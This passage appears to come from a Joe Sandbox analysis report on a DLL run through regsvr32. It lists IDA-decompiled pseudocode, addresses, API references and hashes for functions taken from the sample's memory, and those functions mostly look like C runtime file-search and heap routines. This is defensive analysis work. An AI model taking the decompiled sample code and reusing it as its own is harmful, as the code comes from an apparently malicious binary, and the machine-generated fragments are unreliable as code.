						E6E9EDC0E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e9fc73c; // 0x6e9fd9f8
					if(_t27 != 0) {
						return E6E9EDC0E(_t6);
					}
				}
				return _t6;
			}

0x6e9f1911
0x6e9f1916
0x6e9f191a
0x6e9f1920
0x6e9f1923
0x6e9f1928
0x6e9f192c
0x6e9f1932
0x6e9f1935
0x6e9f193a
0x6e9f193e
0x6e9f1944
0x6e9f1947
0x6e9f194c
0x6e9f1950
0x6e9f1956
0x6e9f1959
0x6e9f195e
0x6e9f195f
0x6e9f1962
0x6e9f1968
0x00000000
0x6e9f1970
0x6e9f1968
0x6e9f1973

APIs

_free.LIBCMT ref: 6E9F1923

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F1935
_free.LIBCMT ref: 6E9F1947
_free.LIBCMT ref: 6E9F1959
_free.LIBCMT ref: 6E9F196B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ea2682037e8547f81ff7f47179c2d408bf4c85a9fc6ab5738721c6f8cfbeda70
Instruction ID: ac3513a494e45ed96d28671c8c487141a8634faf1fa6f909da9fcd4d07e118ec
Opcode Fuzzy Hash: ea2682037e8547f81ff7f47179c2d408bf4c85a9fc6ab5738721c6f8cfbeda70
Instruction Fuzzy Hash: 68F06D71948605DB8A40CAE9F292C5B73EDEF82760B604C05F165DBA01CB30F8C48FE8

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EEB9B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E9EEB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6E9ECC22(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6E9F2161(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6E9EC27C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6E9EDC48(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6E9F2161(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6E9EF185(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6E9EDC0E(_t300);
														_t302 = _v12;
													}
													E6E9EDC0E(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6E9F2161(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E9EC27C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6e9fc024; // 0x45ebcfb3
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6E9F21B0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6E9EEB7E(_t244 - _t287 + 1, _t287,  &_v676, E6E9EF092(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6E9EEAAF( &(_v608.cFileName),  &_v640,  &_v609, E6E9EF092(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6E9EDC0E(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6E9EDC0E(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6E9F1BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6E9EE9E5);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6E9EDC0E(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6E9E9ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6E9EDC0E(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6E9F2170(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6E9EDC0E( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6E9EDC0E(_t283);
						goto L31;
					}
				} else {
					_t219 = E6E9ED46D(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6E9EC24F();
					L31:
					return _t297;
				}
				L81:
			}

0x6e9eeba0
0x6e9eeba3
0x6e9eeba6
0x6e9eeba7
0x6e9eeba9
0x6e9eebbf
0x6e9eebc3
0x6e9eebc6
0x6e9eebc8
0x6e9eebca
0x6e9eebcc
0x6e9eebce
0x6e9eebd1
0x6e9eebd4
0x6e9eebd7
0x6e9eebd9
0x6e9eec3c
0x6e9eec3e
0x6e9eec41
0x6e9eec43
0x6e9eec47
0x6e9eec50
0x6e9eec51
0x6e9eec54
0x6e9eec56
0x6e9eec59
0x6e9eec5d
0x6e9eec5d
0x6e9eec5f
0x6e9eec61
0x6e9eec63
0x6e9eec65
0x6e9eec65
0x6e9eec67
0x6e9eec6a
0x6e9eec6d
0x6e9eec6d
0x6e9eec6f
0x6e9eec70
0x6e9eec70
0x6e9eec7b
0x6e9eec7d
0x6e9eec80
0x6e9eec81
0x6e9eec84
0x6e9eec84
0x6e9eec88
0x6e9eec8b
0x6e9eec8e
0x6e9eec8e
0x6e9eec8e
0x6e9eec9b
0x6e9eec9d
0x6e9eeca0
0x6e9eeca2
0x6e9eecba
0x6e9eecbd
0x6e9eecc0
0x6e9eecc2
0x6e9eecc5
0x6e9eecc7
0x6e9eecca
0x6e9eeccd
0x6e9eed2a
0x6e9eed2d
0x6e9eed30
0x6e9eed32
0x00000000
0x6e9eeccf
0x6e9eecd1
0x6e9eecd1
0x6e9eecd3
0x6e9eecd6
0x6e9eecd6
0x6e9eecd8
0x6e9eecda
0x6e9eece0
0x6e9eece3
0x6e9eece3
0x6e9eece5
0x6e9eece6
0x6e9eece6
0x6e9eeced
0x6e9eecf0
0x6e9eecf4
0x6e9eed01
0x6e9eed06
0x6e9eed09
0x6e9eed0b
0x6e9eed7f
0x6e9eed80
0x6e9eed81
0x6e9eed82
0x6e9eed83
0x6e9eed84
0x6e9eed89
0x6e9eed8d
0x6e9eed8f
0x6e9eed90
0x6e9eed93
0x6e9eed93
0x6e9eed96
0x6e9eed96
0x6e9eed98
0x6e9eed99
0x6e9eed99
0x6e9eed9d
0x6e9eed9e
0x6e9eeda5
0x6e9eeda8
0x6e9eedab
0x6e9eedad
0x6e9eedb5
0x6e9eedb6
0x6e9eedb7
0x6e9eedba
0x6e9eedc4
0x6e9eedc8
0x6e9eedca
0x6e9eedde
0x6e9eedde
0x6e9eede1
0x6e9eedeb
0x6e9eedf0
0x6e9eedf3
0x6e9eedf5
0x00000000
0x6e9eedf7
0x6e9eedf7
0x6e9eedfc
0x6e9eee03
0x6e9eee06
0x6e9eee08
0x6e9eee19
0x6e9eee1b
0x6e9eee1d
0x6e9eee1d
0x6e9eee1d
0x6e9eee0a
0x6e9eee0b
0x6e9eee10
0x6e9eee13
0x6e9eee22
0x6e9eee28
0x00000000
0x6e9eee2b
0x6e9eedcc
0x6e9eedcc
0x6e9eedd2
0x6e9eedd7
0x6e9eedda
0x6e9eeddc
0x6e9eee2e
0x6e9eee30
0x6e9eee31
0x6e9eee32
0x6e9eee33
0x6e9eee34
0x6e9eee35
0x6e9eee3a
0x6e9eee3d
0x6e9eee3e
0x6e9eee40
0x6e9eee46
0x6e9eee4d
0x6e9eee50
0x6e9eee53
0x6e9eee56
0x6e9eee57
0x6e9eee58
0x6e9eee5b
0x6e9eee61
0x6e9eee63
0x6e9eee65
0x6e9eee65
0x6e9eee67
0x6e9eee69
0x00000000
0x00000000
0x6e9eee6b
0x6e9eee6d
0x6e9eee6f
0x6e9eee71
0x6e9eee7c
0x6e9eee7e
0x6e9eee80
0x00000000
0x00000000
0x6e9eee80
0x6e9eee71
0x00000000
0x6e9eee6d
0x6e9eee82
0x6e9eee82
0x6e9eee88
0x6e9eee8a
0x6e9eee90
0x6e9eee92
0x6e9eeeb4
0x6e9eeeb4
0x6e9eeeb6
0x6e9eeeb8
0x6e9eeec4
0x6e9eeec4
0x6e9eeeba
0x6e9eeeba
0x6e9eeebc
0x00000000
0x6e9eeebe
0x6e9eeebe
0x6e9eeec0
0x6e9eeec2
0x00000000
0x00000000
0x6e9eeec2
0x6e9eeebc
0x6e9eeecc
0x6e9eeed4
0x6e9eeeda
0x6e9eeedb
0x6e9eeedd
0x6e9eeee5
0x6e9eeeeb
0x6e9eeef1
0x6e9eeef7
0x6e9eef0b
0x6e9eef10
0x6e9eef1b
0x6e9eef2b
0x6e9eef31
0x6e9eef33
0x6e9eef36
0x6e9eef59
0x6e9eef59
0x6e9eef5e
0x6e9eef64
0x6e9eef64
0x6e9eef6a
0x6e9eef70
0x6e9eef76
0x6e9eef7c
0x6e9eef82
0x6e9eefa3
0x6e9eefa8
0x6e9eefad
0x6e9eefb1
0x6e9eefb7
0x6e9eefba
0x6e9eefcd
0x6e9eefcd
0x6e9eefd3
0x6e9eefd9
0x6e9eefda
0x6e9eefdb
0x6e9eefe0
0x6e9eefe3
0x6e9eefe9
0x6e9eefeb
0x6e9ef049
0x6e9ef04f
0x6e9ef057
0x6e9ef05c
0x6e9ef062
0x6e9ef063
0x00000000
0x00000000
0x00000000
0x6e9eefbc
0x6e9eefbc
0x6e9eefbf
0x6e9eefc1
0x00000000
0x6e9eefc3
0x6e9eefc3
0x6e9eefc6
0x00000000
0x6e9eefc8
0x6e9eefc8
0x6e9eefcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eefcb
0x6e9eefc6
0x6e9eefc1
0x6e9ef065
0x6e9ef066
0x00000000
0x6e9eefed
0x6e9eefed
0x6e9eeff3
0x6e9eeffb
0x6e9ef000
0x6e9ef00f
0x6e9ef00f
0x6e9ef017
0x6e9ef01d
0x6e9ef023
0x6e9ef02a
0x6e9ef02d
0x6e9ef02f
0x6e9ef03f
0x6e9ef044
0x00000000
0x6e9eef38
0x6e9eef38
0x6e9eef3e
0x6e9eef3f
0x6e9eef40
0x6e9eef41
0x6e9eef49
0x6e9eef49
0x6e9ef06c
0x6e9ef06c
0x6e9ef073
0x6e9ef074
0x6e9ef07c
0x6e9ef081
0x6e9ef082
0x6e9eee94
0x6e9eee94
0x6e9eee97
0x6e9eee99
0x6e9eeeae
0x00000000
0x6e9eee9b
0x6e9eee9b
0x6e9eee9e
0x6e9eee9f
0x6e9eeea0
0x6e9eeea1
0x6e9eeea6
0x6e9eee99
0x6e9ef087
0x6e9ef088
0x6e9ef08a
0x6e9ef091
0x00000000
0x00000000
0x00000000
0x6e9eeddc
0x6e9eedaf
0x6e9eedb1
0x6e9eedb2
0x6e9eedb4
0x6e9eedb4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eed0d
0x6e9eed0d
0x6e9eed13
0x6e9eed16
0x6e9eed19
0x6e9eed1c
0x6e9eed1f
0x6e9eed22
0x6e9eed25
0x6e9eed25
0x00000000
0x6e9eecd6
0x6e9eeca4
0x6e9eeca4
0x6e9eeca7
0x6e9eed34
0x6e9eed35
0x6e9eed3a
0x00000000
0x6e9eed3a
0x6e9eebdb
0x6e9eebdb
0x6e9eebde
0x6e9eebe6
0x6e9eebe9
0x6e9eebf0
0x6e9eebf2
0x6e9eebf4
0x6e9eec0f
0x6e9eec10
0x6e9eec11
0x6e9eec12
0x6e9eec17
0x6e9eec1a
0x6e9eec1d
0x6e9eebf6
0x6e9eebf6
0x6e9eebf9
0x6e9eebfa
0x6e9eebfb
0x6e9eebfc
0x6e9eebfd
0x6e9eec02
0x6e9eec04
0x6e9eec07
0x6e9eec07
0x6e9eec1f
0x6e9eec21
0x00000000
0x00000000
0x6e9eec2a
0x6e9eec2d
0x6e9eec30
0x6e9eec32
0x6e9eec34
0x00000000
0x6e9eec36
0x6e9eec36
0x6e9eec39
0x00000000
0x6e9eec39
0x00000000
0x6e9eec34
0x6e9eecaf
0x6e9eed3b
0x6e9eed3e
0x6e9eed42
0x6e9eed4b
0x6e9eed4e
0x6e9eed52
0x6e9eed52
0x6e9eed54
0x6e9eed57
0x6e9eed59
0x6e9eed5b
0x6e9eed5d
0x6e9eed62
0x6e9eed63
0x6e9eed67
0x6e9eed67
0x6e9eed6b
0x6e9eed6e
0x6e9eed6e
0x6e9eed72
0x00000000
0x6e9eed79
0x6e9eebab
0x6e9eebab
0x6e9eebb2
0x6e9eebb3
0x6e9eebb5
0x6e9eed7a
0x6e9eed7e
0x6e9eed7e
0x00000000

APIs

_free.LIBCMT ref: 6E9EED35

Strings

*?, xrefs: 6E9EEBDE

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
Instruction ID: 281f2fa580f1972745f4398691731440407b0cee76191dfe4d0564099d8e448c
Opcode Fuzzy Hash: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
Instruction Fuzzy Hash: 98615975E002199FDB16CFA8C8819EEBBF9EF88314B14856AD915E7704E731EE418F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EAE74 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E6E9EAE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6e9fa770);
				E6E9E9960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6E9E9DB0(_t107, E6E9EAC5A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6E9E9DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e9fd368; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e9f51b8();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6E9ED547(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6e9fa790);
									E6E9E9960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6E9EAE74(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E9EBB74(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E9EBB84(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
